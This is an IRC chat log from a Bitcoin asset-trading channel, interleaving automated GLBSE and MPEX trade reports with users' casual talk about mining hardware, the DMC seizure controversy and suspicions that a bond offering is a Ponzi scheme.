Sep 14 14:35:41 wow after i restarted it fine, not problem Sep 14 14:36:07 how do i check it? Sep 14 14:36:27 also anyway to know if it could just be me chaning the video cards? i did change a card or two in it Sep 14 14:36:30 You can do a surface scan in windows. There's other software on the net too. Sep 14 14:37:01 Ya, that SMART one should be small and fast. It's a very good idea to check the SMART data. Sep 14 14:37:11 okay Sep 14 14:37:22 and what if i find it has some bad stuff, what then? Sep 14 14:37:25 take back the hdd? Sep 14 14:37:37 Yup, or use it for skeet shooting. Sep 14 14:37:58 hmmm okay Sep 14 14:38:16 [MPEX] [S.MPOE] 3899 @ 0.00039489 = 1.5397 BTC [-] Sep 14 14:38:17 [MPEX] [S.MPOE] 1033 @ 0.00039442 = 0.4074 BTC [-] Sep 14 14:38:25 atleast i know what the issue is Sep 14 14:38:34 not knowing and trying to fix something just kills me inside Sep 14 14:38:50 was testing the cards, the ram, the psu lol Sep 14 14:39:53 im not really good at this stuff Sep 14 14:40:08 im trained in business admin... Sep 14 14:40:09 Chaang-Noi you got crazy insano low prices or what? Sep 14 14:40:19 what do you mean oneminer? Sep 14 14:40:39 okay ill look into it, right now it seems to be fine Sep 14 14:40:49 Well, the gear you are selling. I'm wondering how "priced to sell" they are. Sep 14 14:41:20 +1 Sep 14 14:41:29 [GLBSE] [GOLD] 100 @ 0.00989 = 0.989 BTC [+] Sep 14 14:41:33 Shipping two ways, total waste of time. Sep 14 14:42:46 Linky to selling thread? Sep 14 14:43:43 hahaha true. All my gear is a frankenstien collection partially assembled with elecrical tape. Sep 14 14:44:55 [GLBSE] [PUREASIC] 2 @ 0.75 = 1.5 BTC [-] Sep 14 14:45:50 Ya, too bad. Sounds neat. Never heard of a radio tuner card. Check out the... what do you call it? Multiple freq radio on a chip? Sep 14 14:47:47 dont ahve a sell thread yet guys, and it is not fire sale yet Sep 14 14:47:52 and shipping from thailand sucks lol Sep 14 14:48:36 I'm looking for what the damn thing is acually called. It's very cool. It hops freqs quickly and you can get a picture of many Mhz worth of traffic. Sep 14 14:48:41 good luck Sep 14 14:48:51 See ya. Sep 14 14:52:12 [GLBSE] [BAKEWELL] 3 @ 0.15 = 0.45 BTC [+] Sep 14 14:54:07 That's what I need. A nice fire sale, preferably of ASICs (somehow). Sep 14 15:01:02 man a 6970 i just got in is broken :( Sep 14 15:01:09 it is DOA :( Sep 14 15:03:38 [MPEX] [S.MPOE] 183 @ 0.00039607 = 0.0725 BTC [+] Sep 14 15:08:40 [GLBSE] [GIGAMINING] 7 @ 0.6076 = 4.2532 BTC [+] Sep 14 15:11:35 [GLBSE] [KRAKEN] 63 @ 0.00900001 = 0.567 BTC [-] Sep 14 15:13:06 [GLBSE] [PUREMINING] 3 @ 0.08710001 = 0.2613 BTC [-] Sep 14 15:13:51 [GLBSE] [PUREMINING] 45 @ 0.0871 = 3.9195 BTC [-] Sep 14 15:14:21 [GLBSE] [PUREMINING] 27 @ 0.087 = 2.349 BTC [-] Sep 14 15:15:15 [GLBSE] [PUREMINING] 1 @ 0.0867 BTC [-] Sep 14 15:16:24 [GLBSE] [PUREMINING] 4 @ 0.08665 = 0.3466 BTC [-] Sep 14 15:16:25 [GLBSE] [PUREMINING] 21 @ 0.0865 = 1.8165 BTC [-] Sep 14 15:27:48 mornin Sep 14 15:28:06 hi Sep 14 15:28:15 heya Sep 14 15:28:18 how is it Sep 14 15:28:23 fine Sep 14 15:28:39 [MPEX] [S.MPOE] 36200 @ 0.00039666 = 14.3591 BTC [+] Sep 14 15:29:03 [GLBSE] [OBSI.HRPT] 2 @ 0.10149999 = 0.203 BTC [+] Sep 14 15:45:23 What's the thing with DMC being seized? Sep 14 15:46:01 Lot's of drama, hurt feelings. There's some stuff in the DMC thread about it. Sep 14 15:48:02 I thought Diablo had gone insane when he started to trade mhash against mhash... when selling market and buying market would have been a better deal to get mhash. Sep 14 15:50:35 [GLBSE] [OBSI.HRPT] 1 @ 0.1009 BTC [-] Sep 14 15:50:36 [GLBSE] [OBSI.HRPT] 13 @ 0.099 = 1.287 BTC [-] Sep 14 15:50:38 [GLBSE] [OBSI.HRPT] 760 @ 0.098 = 74.48 BTC [-] Sep 14 15:50:46 well, incompetent people winging it. Sep 14 15:51:31 [GLBSE] [OBSI.HRPT] 786 @ 0.098 = 77.028 BTC [-] Sep 14 15:51:45 OT: http://www.youtube.com/watch?v=AadlbBus2Z0&NR=1&feature=endscreen 28:30 I likey. Sep 14 15:53:48 [GLBSE] [OBSI.HRPT] 400 @ 0.098 = 39.2 BTC [-] Sep 14 15:54:14 [MPEX] [S.MPOE] 10917 @ 0.00039651 = 4.3287 BTC [-] Sep 14 15:54:15 [MPEX] [S.MPOE] 18125 @ 0.00039442 = 7.1489 BTC [-] Sep 14 15:54:17 [MPEX] [S.MPOE] 19200 @ 0.00039392 = 7.5633 BTC [-] Sep 14 15:54:18 [MPEX] [S.MPOE] 15158 @ 0.00039366 = 5.9671 BTC [-] Sep 14 15:54:48 Seems one thing is without question, the way DMC was defined in the beginning didn't specifically allow for buying up a bunch of bonds. Sep 14 15:57:32 well, i'm sure to mention this to all my married friends Sep 14 15:57:40 seeing how their marriage contract doesn't specifically allow for anal sex. Sep 14 15:58:06 lol Sep 14 15:58:54 but yes, other than that the correct thing to do upon the ipo failure was to return investor funds. Sep 14 15:58:58 no Sep 14 15:59:02 I acutally don't fault the buys he made (total noob here, don't listen to a word I say). But it does seem that nefario has the autority to do whatever. Sep 14 15:59:05 somehow this doesn't occur to anyone as a path to take. Sep 14 15:59:25 OneMiner his buys were insane. it's completely unclear whereof does nefario get any authority. Sep 14 15:59:30 he's pr. Sep 14 15:59:44 it was if satoshidice took the money then traded it all for some promising stakes in new competitors that have not been coded yet Sep 14 16:00:22 Bugpowder well erik is perfectly within his right to spend his money on w/e he wants, he'sselling his own stake. different thing altogether. Sep 14 16:00:28 nefario can influence these things. Who can stop him? It's up to him to define GLBSE too right? Sep 14 16:00:38 [GLBSE] [BITNODES] 2 @ 0.24 = 0.48 BTC [-] Sep 14 16:00:39 [GLBSE] [BITNODES] 6 @ 0.2449 = 1.4694 BTC [+] Sep 14 16:03:16 ya well these'd all be problems of teh global scam exchange, im sure they sort it out eventually Sep 14 16:03:23 to the greater drama ofcourse. Sep 14 16:04:13 I do find it problematic that one person can sieze assets and shut people down on a whim essentially. Sep 14 16:04:31 [GLBSE] [TYGRR.BOND-A] 1 @ 0.115 BTC [-] Sep 14 16:04:49 i don't. Sep 14 16:05:02 what i find problematic is that random joe blow with no competence in any field does it. Sep 14 16:05:49 take the example of this seizure : it was perfectly warranted and poorly implemented (or w/e, horribly communicated) Sep 14 16:06:19 Anybody can open a lemonaid stand. If it tastes good or has nails in it is due to the person running it. To stop people you'd have to put some kind of filter in place that whouldn't work out very well I think. Sep 14 16:06:54 Wut? No way! lol Sep 14 16:08:08 in practice if "anyone can open a lemonade stand" the net result is a spiral of doom, poorer and poorer quality. Sep 14 16:08:09 Now I have to move to South America to evade capture. Maybe the IRS will be after me too now. lulz Sep 14 16:08:12 hence the apparition of lemon laws. Sep 14 16:08:15 you know what those are ? Sep 14 16:08:20 nefario shut me down, locked my account cuz he assumed i was a scammer Sep 14 16:19:39 He locked it down for investigation... so long as he unlocks it afterward unless something is not as it should. Sep 14 16:19:39 [MPEX] [S.MPOE] 7942 @ 0.00039366 = 3.1264 BTC [-] Sep 14 16:19:39 [MPEX] [S.MPOE] 22658 @ 0.0003935 = 8.9159 BTC [-] Sep 14 16:21:01 [MPEX] [O.BTCUSD.P150T] 1 @ 0.4189883 BTC [-] Sep 14 16:40:40 omg Sep 14 16:40:42 usagi https://bitcointalk.org/index.php?topic=109415.msg1190429;topicseen#msg1190429 Sep 14 16:41:11 havent even started to read Sep 14 16:41:36 aha Sep 14 16:42:48 [GLBSE] [JAH] 39 @ 0.131 = 5.109 BTC [-] Sep 14 16:42:49 [GLBSE] [JAH] 50 @ 0.1301 = 6.505 BTC [-] Sep 14 16:42:50 [GLBSE] [JAH] 1 @ 0.13 BTC [-] Sep 14 16:46:06 [MPEX] [S.MPOE] 3142 @ 0.0003935 = 1.2364 BTC [-] Sep 14 16:46:07 [MPEX] [S.MPOE] 21200 @ 0.00039325 = 8.3369 BTC [-] Sep 14 16:46:08 [MPEX] [S.MPOE] 8358 @ 0.00039314 = 3.2859 BTC [-] Sep 14 16:46:13 yea Sep 14 16:55:38 [GLBSE] [GIGAMINING] 7 @ 0.6189 = 4.3323 BTC [+] Sep 14 16:56:17 [GLBSE] [GSDPT] 307 @ 0.0033994 = 1.0436 BTC [+] Sep 14 16:56:41 [GLBSE] [GSDPT] 279 @ 0.0033995 = 0.9485 BTC [+] Sep 14 16:57:10 [GLBSE] [GIGAMINING] 8 @ 0.619 = 4.952 BTC [+] Sep 14 16:57:59 [GLBSE] [FPGAMINING] 1 @ 0.69995 BTC [-] Sep 14 17:00:37 [GLBSE] [GIGAMINING] 1 @ 0.619 BTC [+] Sep 14 17:10:58 [GLBSE] [GIGAMINING] 4 @ 0.61948 = 2.4779 BTC [+] Sep 14 17:11:48 [MPEX] [S.MPOE] 16800 @ 0.00039396 = 6.6185 BTC [+] Sep 14 17:15:50 like? Sep 14 17:18:08 I prefer doing finances. Sep 14 17:18:46 I'm not interested in CPA =/ Sep 14 17:18:51 who did you hire Sep 14 17:18:59 I think it insures too much for too low rates. Sep 14 17:18:59 meh Sep 14 17:19:24 [GLBSE] [GIGAMINING] 9 @ 0.61948 = 5.5753 BTC [+] Sep 14 17:31:45 mp says low rates are investing in market share Sep 14 17:31:47 ;> Sep 14 17:33:56 who's mp ? Sep 14 17:34:21 u negro Sep 14 17:34:33 so what did i say ?! Sep 14 17:34:39 mircea_popadopalous Sep 14 17:34:42 lol Sep 14 17:34:43 pimp #1 Sep 14 17:35:28 http://polimedia.us/dtng/c/src/13476286536.jpg <<< dun mess with me or you'll have to face her. Sep 14 17:36:00 damn Sep 14 17:36:12 i thought i was going to die for a second looking at that Sep 14 17:36:28 "die for a second", french way of saying blowing your load. Sep 14 17:37:05 [MPEX] [S.MPOE] 11980 @ 0.00039666 = 4.752 BTC [+] Sep 14 17:37:07 [MPEX] [S.MPOE] 16300 @ 0.00039679 = 6.4677 BTC [+] Sep 14 17:37:08 [MPEX] [S.MPOE] 12983 @ 0.0003968 = 5.1517 BTC [+] Sep 14 17:37:09 [MPEX] [S.MPOE] 1237 @ 0.00039704 = 0.4911 BTC [+] Sep 14 17:37:56 [GLBSE] [ASICMINER] 50 @ 0.1198 = 5.99 BTC [+] Sep 14 17:38:19 you can ignore me EskimoBob, I won't mind at all. In fact, I insist. Sep 14 17:39:00 [GLBSE] [BTC-BOND] 1 @ 0.0099 BTC [-] Sep 14 17:39:00 [GLBSE] [BTC-BOND] 5 @ 0.00999999 = 0.05 BTC [+] Sep 14 17:58:01 [GLBSE] [TYGRR.BOND-P] 1 @ 0.035 BTC [-] Sep 14 17:58:05 [GLBSE] [TYGRR.BOND-P] 1 @ 0.035 BTC [-] Sep 14 17:59:24 I only do bermudan options Sep 14 17:59:40 and only with girls ? Sep 14 18:00:18 .035 Sep 14 18:00:34 not even 8 cents traded Sep 14 18:00:40 Chaang-Noi: so do you still think I'm a terrible person? Sep 14 18:00:55 i never said that, i said i was disapointed Sep 14 18:00:58 and sad Sep 14 18:01:00 and i am Sep 14 18:01:02 lol Sep 14 18:01:06 you still haven't told me why Sep 14 18:02:21 [MPEX] [S.MPOE] 13800 @ 0.00039514 = 5.4529 BTC [-] Sep 14 18:02:22 [MPEX] [S.MPOE] 15652 @ 0.00039396 = 6.1663 BTC [-] Sep 14 18:02:53 pfft, black scholes is so last century Sep 14 18:07:42 [GLBSE] [MMM] 1 @ 1 BTC [+] Sep 14 18:12:00 [GLBSE] [YARR] 14 @ 0.99999999 = 14 BTC [+] Sep 14 18:12:01 [GLBSE] [YARR] 17 @ 1 = 17 BTC [+] Sep 14 18:18:40 [MPEX] [S.DICE] 5000 @ 0.0034 = 17 BTC [+] Sep 14 18:19:47 [MPEX] [F.GIGA.ETF] 34900 @ 0.000415 = 14.4835 BTC [+] Sep 14 18:19:49 [MPEX] [F.GIGA.ETF] 6800 @ 0.00041699 = 2.8355 BTC [+] Sep 14 18:19:50 [MPEX] [F.GIGA.ETF] 3300 @ 0.00041923 = 1.3835 BTC [+] Sep 14 18:19:56 [GLBSE] [OBSI.HRPT] 7 @ 0.09800001 = 0.686 BTC [+] Sep 14 18:19:58 [GLBSE] [OBSI.HRPT] 2774 @ 0.098 = 271.852 BTC [-] Sep 14 18:20:41 [GLBSE] [OBSI.HRPT] 6 @ 0.09800001 = 0.588 BTC [+] Sep 14 18:20:42 [GLBSE] [OBSI.HRPT] 2280 @ 0.098 = 223.44 BTC [-] Sep 14 18:20:43 [GLBSE] [OBSI.HRPT] 110 @ 0.0975 = 10.725 BTC [-] Sep 14 18:20:44 [GLBSE] [OBSI.HRPT] 50 @ 0.097 = 4.85 BTC [-] Sep 14 18:20:45 [GLBSE] [OBSI.HRPT] 10 @ 0.09600001 = 0.96 BTC [-] Sep 14 18:20:47 [GLBSE] [OBSI.HRPT] 135 @ 0.096 = 12.96 BTC [-] Sep 14 18:20:48 [GLBSE] [OBSI.HRPT] 3 @ 0.095952 = 0.2879 BTC [-] Sep 14 18:20:49 [GLBSE] [OBSI.HRPT] 99 @ 0.0951 = 9.4149 BTC [-] Sep 14 18:20:50 [GLBSE] [OBSI.HRPT] 1 @ 0.0901 BTC [-] Sep 14 18:21:37 [GLBSE] [OBSI.HRPT] 13 @ 0.08999999 = 1.17 BTC [-] Sep 14 18:21:39 [GLBSE] [OBSI.HRPT] 37 @ 0.09 = 3.33 BTC [+] Sep 14 18:22:43 [GLBSE] [OBSI.HRPT] 269 @ 0.09 = 24.21 BTC [+] Sep 14 18:23:58 RAH Sep 14 18:24:08 GLBSE is getting slow again Sep 14 18:25:25 [GLBSE] [KRAKEN] 1089 @ 0.00900001 = 9.801 BTC [-] Sep 14 18:25:28 doesn't obsi sell at 0.1 Sep 14 18:26:27 ah Sep 14 18:26:33 who sold just now Sep 14 18:27:05 someone sold a couple of thousand Sep 14 18:27:14 then bought a coupla thousand. Sep 14 18:27:50 it's the highest volume stock right now? Sep 14 18:28:05 !ticker obsi.hrpt Sep 14 18:28:11 [GLBSE:OBSI.HRPT] [Bid: 0.09000001] [Ask: 0.1] [Spread: 0.00999999] [Last: 0.09] [24hVol: 1,552.71804084] [7dAvg: 0.09557662] Sep 14 18:28:19 yeah seems pretty high for glbse Sep 14 18:28:24 i still don't know what it actually does. Sep 14 18:28:36 nobody knows Sep 14 18:28:42 so pirate rehash ? Sep 14 18:28:59 it's a better scheme than pirate though Sep 14 18:29:06 look at how many bonds are issued Sep 14 18:29:11 he can keep going forever Sep 14 18:29:15 im kinda lazy Sep 14 18:29:32 "forever" as in, a few months, a coupla years maybe ? Sep 14 18:29:54 well, the contract states he may change interest down to 0% Sep 14 18:30:00 so forever as in ... forever Sep 14 18:30:17 "Estimated coupon payouts are 0% to 1% per day" Sep 14 18:30:24 Security issued:10000000 Sep 14 18:30:40 [GLBSE] [NYAN.B] 1 @ 0.9899 BTC [+] Sep 14 18:30:50 lol 1mn btc ? right Sep 14 18:30:52 seems legit Sep 14 18:31:40 it's a bit higher than the collective trust in glbse , I'd wager Sep 14 18:31:49 [GLBSE] [KRAKEN] 1848 @ 0.00900001 = 16.632 BTC [-] Sep 14 18:31:58 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 14 18:32:02 OBSI.HRPT [1@0.1BTC] paid: 0.059745 BTC. Last price: 0.09 BTC. Capital gain: -0.01 BTC. Total: 0.049745 BTC. (49.7%) Sep 14 18:32:23 [GLBSE] [BITCOINMINV] 71 @ 0.127 = 9.017 BTC [+] Sep 14 18:32:25 splits/ Sep 14 18:32:27 ? Sep 14 18:32:31 glbse can split now? Sep 14 18:32:38 no ideea Sep 14 18:33:32 tho at the rate it's paying out i doubt your "forever". Sep 14 18:33:59 yes, there was a split on one asset Sep 14 18:34:13 well forever as in bitcoin terms Sep 14 18:34:19 a couple of months or so Sep 14 18:34:21 where each asset owned got multiplied by 10 or 100 or whatever. Sep 14 18:35:08 I actually made money on BMF Sep 14 18:35:16 soo, anyone want to lend me a coupla million obsi.hrpt for 3 months ? Sep 14 18:36:14 [GLBSE] [YABIF] 3 @ 0.99 = 2.97 BTC [-] Sep 14 18:36:38 It doubles in 3 months doesn't it, at the interest it's paying. So you'd have to pay full buying price to loan them. Sep 14 18:36:43 Okay my math is off Sep 14 18:38:02 usagi: yeah, back in may Sep 14 18:39:26 .. which will increase difficulty and lower the value of the holdings? Sep 14 18:40:21 [GLBSE] [PUREMINING] 20 @ 0.09 = 1.8 BTC [+] Sep 14 18:40:40 You probably wouldn't affect difficulty that much by yourself Sep 14 18:41:16 The trick is to trigger the next big wave in bitcoin Sep 14 18:41:27 [GLBSE] [PUREMINING] 2 @ 0.0873 = 0.1746 BTC [-] Sep 14 18:41:29 [GLBSE] [PUREMINING] 4 @ 0.0873 = 0.3492 BTC [-] Sep 14 18:41:31 which will be when profit from fees exceed the block reward Sep 14 18:41:33 [GLBSE] [GSDPT] 3 @ 0.003399 = 0.0102 BTC [-] Sep 14 18:42:15 well, something might cause fees to increase Sep 14 18:42:17 [GLBSE] [GSDPT] 4 @ 0.003399 = 0.0136 BTC [-] Sep 14 18:42:22 if miners form a union f.ex. Sep 14 18:42:34 or the pools do Sep 14 18:44:38 [GLBSE] [YABMC] 28 @ 0.0917 = 2.5676 BTC [-] Sep 14 18:44:52 [MPEX] [S.MPOE] 3348 @ 0.00039332 = 1.3168 BTC [-] Sep 14 18:44:54 [MPEX] [S.MPOE] 12963 @ 0.00039704 = 5.1468 BTC [+] Sep 14 18:44:55 [MPEX] [S.MPOE] 33600 @ 0.00039716 = 13.3446 BTC [+] Sep 14 18:44:55 [MPEX] [S.MPOE] 11774 @ 0.00039793 = 4.6852 BTC [+] Sep 14 18:44:58 [GLBSE] [OBSI.HRPT] 9 @ 0.09000001 = 0.81 BTC [+] Sep 14 18:45:00 [GLBSE] [OBSI.HRPT] 4 @ 0.08819013 = 0.3528 BTC [-] Sep 14 18:45:01 [GLBSE] [OBSI.HRPT] 10 @ 0.08782041 = 0.8782 BTC [-] Sep 14 18:45:03 [GLBSE] [OBSI.HRPT] 24 @ 0.08696412 = 2.0871 BTC [-] Sep 14 18:45:04 [GLBSE] [OBSI.HRPT] 6 @ 0.0864171 = 0.5185 BTC [-] Sep 14 18:45:05 [GLBSE] [OBSI.HRPT] 3 @ 0.086 = 0.258 BTC [-] Sep 14 18:45:05 [GLBSE] [OBSI.HRPT] 18 @ 0.0850111 = 1.5302 BTC [-] Sep 14 18:45:07 [GLBSE] [OBSI.HRPT] 3 @ 0.0850111 = 0.255 BTC [-] Sep 14 18:45:08 [GLBSE] [OBSI.HRPT] 30 @ 0.085 = 2.55 BTC [-] Sep 14 18:45:26 [GLBSE] [GIGAMINING] 4 @ 0.6195 = 2.478 BTC [+] Sep 14 18:45:34 guess it worked - dump, and now the wall is gone Sep 14 18:47:10 was this the market manipulation you were talking about, usagi? Sep 14 18:49:25 but now the bond is yielding 8.24% a week Sep 14 18:49:29 with daily payouts Sep 14 18:49:44 I'd be surprised if nobody buys at this point Sep 14 18:49:50 How come it's hovering below 0.1? Sep 14 18:51:16 because obsi can sell 10000000 of them at any time Sep 14 18:52:08 oh I see, didn't notice that before Sep 14 18:52:51 So how many of the 10 mil shares have been issued? Sep 14 18:52:54 I guess because people are expecting it to close doors? Sep 14 18:53:06 nobody has any coin Sep 14 18:53:12 Just over 50,000>? oh Sep 14 18:53:27 https://glbse.com/api/quantity_trading/OBSI.HRPT Sep 14 18:54:27 Indeed, or around 5000 BTC Sep 14 18:54:29 hmm, there's a post saying he won't issue more this sunday Sep 14 18:54:50 Good. Sep 14 18:55:22 kakobrekla nobody who throws money around at "investments" has any coin left. they who have coin don't "invest" in non-investments. Sep 14 18:55:33 its how teh free market works. Sep 14 18:57:40 and another @ 0.1 /1461 Sep 14 18:58:29 Mass sellers brings more mass sellers. Sep 14 18:59:23 I suppose everyone invested thinks it's a ponzi and as such, no demand, no cash flow, no more div. Runaway time. Sep 14 18:59:29 [GLBSE] [CPA] 1 @ 0.033 BTC [+] Sep 14 19:00:15 hmm, roughly, if it's a ponzi, he could still pay out for about 14 weeks Sep 14 19:00:22 even if he doesn't sell more bonds Sep 14 19:00:35 yea but from a game theory perspective Sep 14 19:00:39 if he keeps paying, I'm sure some buying will happen for the return Sep 14 19:00:48 thus allowing it to continue Sep 14 19:00:50 the only incentive for a ponzi scammer to make a payout is the notion that he's going to skip ion a larger one later. Sep 14 19:01:18 for a pure one yes Sep 14 19:01:24 yeah. Sep 14 19:01:27 but who's to say he doesn't reinvest the money Sep 14 19:01:44 into something very lucrative that we can't be told about ? Sep 14 19:01:46 ofcourse he does. Sep 14 19:01:58 if he does he can prolong it even more Sep 14 19:02:08 you prolly missed my sarcasm. Sep 14 19:02:09 How do I leave a message to someone that's not online? Sep 14 19:02:15 ;;later tell Sep 14 19:02:17 ;;later tell name message Sep 14 19:02:56 ;;later tell MoneyIsDebt I told you so Sep 14 19:02:56 The operation succeeded. Sep 14 19:03:15 ;;later tell Nefario Don't forget my candy bar^^ Sep 14 19:03:15 The operation succeeded. Sep 14 19:03:19 ;;later tell Nefario1 Don't forget my candy bar^^ Sep 14 19:03:19 The operation succeeded. Sep 14 19:03:21 The operation succeeded. Sep 14 19:03:25 thanks Sep 14 19:03:30 mircea, he technically told how the money was used, although if that's true or even feasible is questionable. Sep 14 19:03:37 He owes me a candy bar :) Sep 14 19:04:07 [GLBSE] [FUTUREFUND] 15 @ 0.00012682 = 0.0019 BTC [+] Sep 14 19:04:33 BTC-Mining he did ? Sep 14 19:04:37 maybe i missed it. Sep 14 19:04:55 [GLBSE] [DMC] 3 @ 0.035 = 0.105 BTC [-] Sep 14 19:06:19 [GLBSE] [OBSI.HRPT] 2 @ 0.09989997 = 0.1998 BTC [+] Sep 14 19:06:34 [GLBSE] [OBSI.HRPT] 1 @ 0.09989997 BTC [+] Sep 14 19:06:59 ^^ Rally! Sep 14 19:06:59 [GLBSE] [PUREMINING] 5 @ 0.0872 = 0.436 BTC [-] Sep 14 19:08:35 lol Sep 14 19:09:26 The bids are piling up on CPA, usagi Sep 14 19:09:29 Unless Sep 14 19:09:33 that's you? :P Sep 14 19:10:13 [MPEX] [S.MPOE] 7801 @ 0.00039497 = 3.0812 BTC [-] Sep 14 19:10:40 [GLBSE] [BMMO] 6 @ 0.076889 = 0.4613 BTC [-] Sep 14 19:10:55 Indeed. Sep 14 19:11:58 You were selling matthew-default contracts? Sep 14 19:12:05 damn Sep 14 19:12:08 [GLBSE] [DI.BFLSC.FAIL] 15 @ 0.001 = 0.015 BTC [+] Sep 14 19:12:22 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.10508971 = 105.0897 BTC [+] Sep 14 19:12:43 BTC-Mining: She didn't know Matthew before so... Sep 14 19:12:48 I can't blame her all too much. Sep 14 19:13:02 Matthew can be pretty charming at first sight Sep 14 19:13:28 I mean, he suckered me into DCAO Sep 14 19:13:36 and almost had me work for free Sep 14 19:13:46 like a lot of his writers. Sep 14 19:13:56 "Rewards will come eventually." Sep 14 19:14:02 [GLBSE] [FPGAMINING] 5 @ 0.6901 = 3.4505 BTC [-] Sep 14 19:14:04 [GLBSE] [FPGAMINING] 28 @ 0.69 = 19.32 BTC [-] Sep 14 19:14:05 [GLBSE] [FPGAMINING] 1 @ 0.65515 BTC [-] Sep 14 19:14:07 [GLBSE] [FPGAMINING] 3 @ 0.6551 = 1.9653 BTC [-] Sep 14 19:14:08 [GLBSE] [FPGAMINING] 1 @ 0.655 BTC [-] Sep 14 19:14:09 [GLBSE] [FPGAMINING] 2 @ 0.65 = 1.3 BTC [-] Sep 14 19:14:10 I bet 10k BTC, I didn't think he'd pay up, but I was 100% sure pirate wasn't going to pay. Sep 14 19:14:13 That's when he didn't give any stock to the people who actually make the magazine possible. Sep 14 19:14:31 As such betting 1 BTC or 1 million BTC carried the same risk in my opinion. Sep 14 19:15:32 I started to doubt him when he got into the $300,000 territory. Sep 14 19:15:41 He's such a child. Sep 14 19:16:53 [GLBSE] [FOO.PPPPT] 2 @ 0.035 = 0.07 BTC [+] Sep 14 19:17:03 usagi: I can only imagine him running red lights in his suzuki right now. Sep 14 19:17:53 [GLBSE] [SS] 1 @ 0.0191 BTC [-] Sep 14 19:17:54 [GLBSE] [SS] 1 @ 0.0192 BTC [+] Sep 14 19:17:55 [GLBSE] [SS] 1 @ 0.0193 BTC [+] Sep 14 19:18:18 SS is highly spoken of Sep 14 19:18:24 I don't know what it is though Sep 14 19:19:15 iirc it was a partnership between smickles and some other guy to run a sort of arb bot Sep 14 19:19:22 I am now remembering why I didn't finish this movie Sep 14 19:19:28 It's boring as hell Sep 14 19:19:54 Arbitrage is too hard to pull off Sep 14 19:20:01 Mt. Gox pretty much has a monopoly Sep 14 19:20:10 Until it gets too strained Sep 14 19:20:14 It will continue to have it Sep 14 19:21:00 [MPEX] [O.BTCUSD.P130N] 1 @ 0.3880117 BTC [+] Sep 14 19:21:20 well what can i tell you. Sep 14 19:21:21 yeah, SS was the stock that was split by 100x Sep 14 19:21:31 So reinvesting was easier Sep 14 19:21:46 SS should of just promised to buy back profits Sep 14 19:21:54 That would of been more efficient of a move Sep 14 19:22:22 [GLBSE] [THUNDERCM.MIF.SHARES] 9 @ 0.3917 = 3.5253 BTC [-] Sep 14 19:22:35 E.g. use a total divided to buyback shares at a price of principal + profit Sep 14 19:22:38 Obsi was last seen in #bitcoin-assets 14 hours, 10 minutes, and 34 seconds ago: https://bitcointalk.org/index.php?topic=105506.0 Sep 14 19:22:43 dividend* Sep 14 19:22:52 People are so dependent on dividends. Sep 14 19:22:57 Share value has no meaning to them. Sep 14 19:31:24 [GLBSE] [NASTY] 2 @ 0.5552 = 1.1104 BTC [+] Sep 14 19:32:47 [GLBSE] [HYDRO.BONDS] 1 @ 1.42989 BTC [+] Sep 14 19:36:23 [GLBSE] [ASICMINER] 50 @ 0.1198 = 5.99 BTC [+] Sep 14 19:36:25 [GLBSE] [ASICMINER] 48 @ 0.11999899 = 5.76 BTC [+] Sep 14 19:36:56 [GLBSE] [FPGAMINING] 2 @ 0.637 = 1.274 BTC [-] Sep 14 19:36:58 [GLBSE] [FPGAMINING] 6 @ 0.6366 = 3.8196 BTC [-] Sep 14 19:36:59 [GLBSE] [FPGAMINING] 3 @ 0.6365 = 1.9095 BTC [-] Sep 14 19:37:00 [GLBSE] [FPGAMINING] 4 @ 0.632 = 2.528 BTC [-] Sep 14 19:37:01 [GLBSE] [FPGAMINING] 1 @ 0.6315 BTC [-] Sep 14 19:37:02 [GLBSE] [FPGAMINING] 4 @ 0.6301 = 2.5204 BTC [-] Sep 14 19:37:52 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.90384615 BTC [-] Sep 14 19:38:43 [GLBSE] [HYDRO.BONDS] 2 @ 1.4001 = 2.8002 BTC [-] Sep 14 19:38:45 [GLBSE] [HYDRO.BONDS] 10 @ 1.4 = 14 BTC [-] Sep 14 19:46:04 [MPEX] [S.MPOE] 24893 @ 0.00039793 = 9.9057 BTC [+] Sep 14 19:46:06 [GLBSE] [FPGAMINING] 6 @ 0.6601 = 3.9606 BTC [+] Sep 14 19:46:07 [GLBSE] [FPGAMINING] 10 @ 0.66 = 6.6 BTC [-] Sep 14 19:46:08 [GLBSE] [FPGAMINING] 10 @ 0.65 = 6.5 BTC [-] Sep 14 19:46:10 [GLBSE] [FPGAMINING] 8 @ 0.64 = 5.12 BTC [-] Sep 14 19:48:18 Haha, I couldn't of said it better. Sep 14 19:48:26 People tend to focus on the short-term Sep 14 19:48:36 and not the long-term integrity of the investment vehicle Sep 14 19:49:31 well share value has no value to them because most things purporting to be shares aren't. Sep 14 19:50:29 Hm, I guess you could say mining turds are raw investments but with all the risk attached Sep 14 19:54:15 [GLBSE] [ASICMINER] 118 @ 0.11999998 = 14.16 BTC [+] Sep 14 19:54:17 [GLBSE] [ASICMINER] 110 @ 0.11999999 = 13.2 BTC [+] Sep 14 19:56:18 [GLBSE] [BFLS.RIG] 3 @ 0.8 = 2.4 BTC [-] Sep 14 19:59:27 [GLBSE] [ASICMINER] 27 @ 0.11999999 = 3.24 BTC [+] Sep 14 19:59:50 So people are not breaking even on these? Sep 14 20:00:50 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 14 20:00:56 GIGAMINING [1@1.25BTC] paid: 0.44317596 BTC. Last price: 0.6195 BTC. Capital gain: -0.6305 BTC. Total: -0.18732404 BTC. (-15%) Sep 14 20:01:09 [GLBSE] [ASICMINER] 3 @ 0.11999999 = 0.36 BTC [+] Sep 14 20:02:13 what does that command really show though, when you don't include a date Sep 14 20:02:24 Oh wow Sep 14 20:02:49 Eskimo, they were sold for 1 BTC on IPO Sep 14 20:02:49 !pl [@] [] Sep 14 20:02:55 !pl GIGAMINING 1 Sep 14 20:02:56 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 14 20:03:13 GIGAMINING [1@1BTC] paid: 0.44317596 BTC. Last price: 0.6195 BTC. Capital gain: -0.3805 BTC. Total: 0.06267596 BTC. (6.3%) Sep 14 20:03:46 not really relevant unless you bought at day 1 then Sep 14 20:03:58 remember, at day 1 it's priced by the issuer Sep 14 20:04:06 later, the market has priced it Sep 14 20:04:09 Exactly his point. The initial investors are screwed Sep 14 20:04:42 [GLBSE] [GMVT-BOT] 1 @ 0.1202 BTC [+] Sep 14 20:05:24 Hmm, maybe it was at 1.25, but I thought it was IPOed at 1 Sep 14 20:05:31 [GLBSE] 